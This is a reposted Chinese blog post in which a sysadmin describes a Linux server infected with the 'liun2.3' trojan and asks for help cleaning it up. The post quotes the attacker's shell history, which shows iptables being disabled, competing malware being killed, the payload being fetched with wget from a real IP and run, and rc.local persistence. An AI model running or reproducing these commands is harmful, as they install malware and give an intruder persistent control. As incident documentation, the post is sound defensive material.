码迷,mamicode.com
首页 > 系统相关 > 详细

linux服务器中了一个liun2.3的木马

时间:2014-07-02 16:00:34      阅读:393      评论:0      收藏:0      [点我收藏+]

标签:linux安全   linux   安全漏洞   

  

  昨天公司一台服务器突然之间不能ping,ssh无法登陆,从IDC反馈说服务器往外发包,数量巨大,CPU状态显示200%。通过ps aux查看以下进程文件是异常文件:

./liun2.3
/tmp/liun2.3
/tmp/liun2.3h
zzta.pl

刚开始以为kill掉这些进程和删掉执行文件就可以了,可是过了几分钟,这个程序又继续执行。

那好吧,就去crontab -l 看有没有定时任务,没有。

more /etc/crontab 查看有没在这里定义定时任务。也没有

想了下,既然要执行文件,那么在.bash_history上是否由于记录呢?

cd
more .bash_history
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local
/etc/init.d/iptables stop
chmod 0775 /usr/bin/nohup
chmod 0775 /usr/bin/killall
chmod 0775 /usr/bin/rm
killall java-2013
killall wins2
killall liun2.1
killall liun2.0
rm -f -r /etc/wins
rm -f -r /etc/java-2013
rm -f -r /etc/java-2013/java-2013
rm -f -r /etc/liun2.1/liun2.1
rm -f -r /etc/liun2.1
mkdir /etc/liun2.1
cd /../tmp
wget http://60.174.234.107:1974/liun2.3
chmod 0755 liun2.3
chmod 0755 ./liun2.3
./liun2.3
echo "cd /../tmp">>/etc/rc.local
echo "chmod 0755 liun2.3">>/etc/rc.local
echo "chmod 0755 ./liun2.3">>/etc/rc.local
echo "./liun2.3">>/etc/rc.local

 以上是在被入侵的操作。

 看到

wget http://60.174.234.107:1974/liun2.3

直接去下载木马程序。

进一步查找,在init.d目录下发现一个木马启动程序:DbSecuritySpt

并在rc1.d、rc2.d、rc3.d、rc4.d、rc5.d、rc6.d 建立了一个指向init.d目录下的DbSecuritySpt链接

在/usr/bin/下创建一个sgb可执行程序


最后在查找liun*这样的文件时,发现在tomcat/webapps目录下发现liun2.3、liun2.3h这样的文件。

初步认定是tomcat漏洞,就对tomcat进行安全检查,并禁用已被攻击的服务,修改一些端口号。


现在服务是继续跑着,可是后门是否还有后门程序?我的服务器是怎么被侵入攻击的?我一无所知,我是半路学习linux的,对于linux安全知识缺乏,写这篇博文的目的是想知道有没有朋友也遇到这样的攻击,这个网站上都是木马,http://60.174.234.107:1974,有高手看到这博文请帮忙怎么找出这个后门,或者被感染的文件。



本文出自 “胖子笔记” 博客,请务必保留此出处http://pangz.blog.51cto.com/1865802/1433461

linux服务器中了一个liun2.3的木马,布布扣,bubuko.com

linux服务器中了一个liun2.3的木马

标签:linux安全   linux   安全漏洞   

原文地址:http://pangz.blog.51cto.com/1865802/1433461
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!